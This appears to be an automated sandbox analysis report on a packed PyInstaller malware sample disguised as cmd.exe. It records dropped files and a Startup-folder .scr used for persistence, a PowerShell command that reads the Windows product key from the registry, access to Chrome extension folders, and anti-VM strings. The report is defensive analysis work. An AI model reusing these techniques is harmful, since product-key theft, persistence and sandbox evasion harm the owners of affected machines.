              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1q 5 Jul 2022built on: Thu Aug 18 20:15:42 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: cmd.exe, 00000001.00000002.2102679119.00007FFDFB30E000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_hashlib.pdb source: cmd.exe, 00000001.00000002.2105325798.00007FFE10301000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: cmd.exe, 00000001.00000002.2102679119.00007FFDFB390000.00000040.00000001.01000000.0000000F.sdmp
Source: cmd.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: cmd.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: cmd.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: cmd.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: cmd.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER (recorded twice)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault (recorded twice)
Source: VCRUNTIME140.dll.0.dr | Static PE information: 0x8E79CD85 [Sat Sep 30 01:19:01 2045 UTC]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.cmdline" (recorded twice)
Source: libcrypto-1_1.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x1286c2
Source: libffi-7.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x9bb1
Source: python310.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x175084
Source: _ctypes.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x1116d
Source: unicodedata.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x49ec0
Source: _bz2.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x11295
Source: _ssl.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x13959
Source: sqlite3.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x9855f
Source: libssl-1_1.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x3a1a3
Source: _queue.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0xa1bc
Source: _socket.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x121bd
Source: _decimal.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x1f136
Source: _hashlib.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x14f2d
Source: select.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0xe5dd
Source: _lzma.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x2283b
Source: bcdu5fii.dll.48.dr | Static PE information: real checksum: 0x0 should be: 0x5947
Source: _sqlite3.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x16d12
Source: cmd.exe | Static PE information: real checksum: 0x5f9d97 should be: 0x5f954d
Source: libffi-7.dll.0.dr | Static PE information: section name: UPX2
Source: VCRUNTIME140.dll.0.dr | Static PE information: section name: _RDATA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFD98B1EB60 push edx; ret 10_2_00007FFD98B1EBFC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFD98B1D2A5 pushad ; iretd 10_2_00007FFD98B1D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFD98B1FB35 pushad ; iretd 10_2_00007FFD98B1FB37
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFD98C302FD push ds; iretd 10_2_00007FFD98C303E2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFD98C372BB push cs; iretd 10_2_00007FFD98C372CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFD98C31A69 push ds; iretd 10_2_00007FFD98C31A6A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFD98C3862D push ebx; ret 10_2_00007FFD98C386CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFD98C3861D push ebx; ret 10_2_00007FFD98C3862A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFD98C31029 pushad ; iretd 10_2_00007FFD98C3102A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 42_2_00007FFD98C41B11 push ds; iretd 42_2_00007FFD98C41B12
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 42_2_00007FFD98C40B5D push ds; iretd 42_2_00007FFD98C40B82
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 42_2_00007FFD98C40B83 push ds; iretd 42_2_00007FFD98C40B82
Source: initial sample | Static PE information: section name: UPX0 (16 occurrences)
Source: initial sample | Static PE information: section name: UPX1 (16 occurrences)
Source: C:\Users\user\Desktop\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe
Source: C:\Users\user\Desktop\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI72642\libcrypto-1_1.dll
Source: C:\Users\user\Desktop\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI72642\_queue.pyd
Source: C:\Users\user\Desktop\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI72642\_lzma.pyd
Source: C:\Users\user\Desktop\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI72642\_hashlib.pyd
Source: C:\Users\user\Desktop\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI72642\VCRUNTIME140.dll
Source: C:\Users\user\Desktop\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI72642\libssl-1_1.dll
Source: C:\Users\user\Desktop\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI72642\unicodedata.pyd
Source: C:\Users\user\Desktop\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI72642\libffi-7.dll
Source: C:\Users\user\Desktop\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI72642\_sqlite3.pyd
Source: C:\Users\user\Desktop\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI72642\select.pyd
Source: C:\Users\user\Desktop\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI72642\_socket.pyd
Source: C:\Users\user\Desktop\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI72642\_decimal.pyd
Source: C:\Users\user\Desktop\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI72642\_bz2.pyd
Source: C:\Users\user\Desktop\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI72642\_ctypes.pyd
Source: C:\Users\user\Desktop\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI72642\python310.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.dll
Source: C:\Users\user\Desktop\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI72642\sqlite3.dll
Source: C:\Users\user\Desktop\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI72642\_ssl.pyd
Source: C:\Users\user\Desktop\cmd.exe | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr (recorded twice)

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (12 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (9 occurrences)
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AEF5820 GetProcAddress,GetLastError (the pair repeated 45 times) 0_2_00007FF70AEF5820
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exe  Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\getmac.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3705
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2946
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2984
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 675
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1857
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2639
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1260
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4345
              Source: C:\Users\user\Desktop\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72642\_queue.pyd
              Source: C:\Users\user\Desktop\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72642\_lzma.pyd
              Source: C:\Users\user\Desktop\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72642\_hashlib.pyd
              Source: C:\Users\user\Desktop\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72642\unicodedata.pyd
              Source: C:\Users\user\Desktop\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72642\_sqlite3.pyd
              Source: C:\Users\user\Desktop\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72642\select.pyd
              Source: C:\Users\user\Desktop\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72642\_socket.pyd
              Source: C:\Users\user\Desktop\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72642\_decimal.pyd
              Source: C:\Users\user\Desktop\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72642\_bz2.pyd
              Source: C:\Users\user\Desktop\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72642\_ctypes.pyd
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.dll
              Source: C:\Users\user\Desktop\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72642\python310.dll
              Source: C:\Users\user\Desktop\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72642\_ssl.pyd
              Source: C:\Users\user\Desktop\cmd.exe Check user administrative privileges: GetTokenInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724 Thread sleep count: 3705 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7832 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7716 Thread sleep count: 2946 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720 Thread sleep count: 2984 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\svchost.exe TID: 8096 Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900 Thread sleep count: 675 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8332 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6452 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8384 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8372 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8060 Thread sleep count: 2639 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8092 Thread sleep count: 1260 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4564 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3624 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8824 Thread sleep count: 4345 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8820 Thread sleep count: 206 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8816 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8784 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
              Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Users\user\Desktop\cmd.exe Code function: 0_2_00007FF70AEF83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF70AEF83B0
              Source: C:\Users\user\Desktop\cmd.exe Code function: 0_2_00007FF70AEF92F0 FindFirstFileExW,FindClose,0_2_00007FF70AEF92F0
              Source: C:\Users\user\Desktop\cmd.exe Code function: 0_2_00007FF70AF118E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF70AF118E4
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe Code function: 65_2_00007FF69A4046EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,65_2_00007FF69A4046EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe Code function: 65_2_00007FF69A3FE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,65_2_00007FF69A3FE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe Code function: 65_2_00007FF69A4488E0 FindFirstFileExA,65_2_00007FF69A4488E0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images
              Source: C:\Users\user\Desktop\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0
              Source: C:\Users\user\Desktop\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales
              Source: C:\Users\user\Desktop\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css
              Source: C:\Users\user\Desktop\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html
              Source: C:\Users\user\Desktop\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vboxtrayZ
              Source: getmac.exe, 00000031.00000002.1843041975.000001E8EF13C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.1840629752.000001E8EF11C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.1840629752.000001E8EF13C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxservice
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwareservicer4
              Source: WMIC.exe, 0000001F.00000003.1806334380.000001E251AEA000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000001F.00000003.1806502468.000001E251AEB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: qeMU)
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwareuser
              Source: getmac.exe, 00000031.00000003.1840629752.000001E8EF11C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
              Source: svchost.exe, 0000001C.00000002.2946017704.00000240CA658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.2945962404.00000240CA641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.2944570569.00000240C502B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.1843041975.000001E8EF13C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.1840629752.000001E8EF13C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmsrvc
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vboxserviceZ
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwareservicer4Z
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwaretray
              Source: cmd.exe, 00000001.00000003.2091061273.000001C916C6C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1934604967.000001C9172EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1934604967.000001C917269000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
              Source: cmd.exe, 00000001.00000003.1716177022.000001C916988000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2097860677.000001C916930000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmsrvcZ
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxtray
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: qemu-ga
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmware
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwareuserZ
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmusrvc
              Source: getmac.exe, 00000031.00000002.1843041975.000001E8EF13C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.1840629752.000001E8EF13C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAWRoot%\system32\dy
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: qemu-gaZ
              Source: getmac.exe, 00000031.00000003.1840990615.000001E8EF14F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.1843041975.000001E8EF152000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.1840629752.000001E8EF13C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExportD
              Source: getmac.exe, 00000031.00000003.1840990615.000001E8EF14F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.1843041975.000001E8EF152000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.1840629752.000001E8EF13C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmusrvcZ
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmtoolsd
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwarec
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwaretrayZ
